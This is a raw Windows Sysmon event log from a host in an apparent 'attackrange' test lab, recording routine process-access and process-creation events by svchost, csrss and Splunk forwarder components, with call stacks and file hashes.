08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16BA-5F84-6900-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:31.136{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BA-5F84-6900-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.970{5D479F2C-16BA-5F84-6900-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.980{5D479F2C-16BC-5F84-6B00-000000007F01}38482268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BC-5F84-6B00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16BC-5F84-6B00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.824{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16BC-5F84-6B00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:32.657{5D479F2C-16BC-5F84-6B00-000000007F01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.636{5D479F2C-16BD-5F84-6C00-000000007F01}36723776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BD-5F84-6C00-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:33.496{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 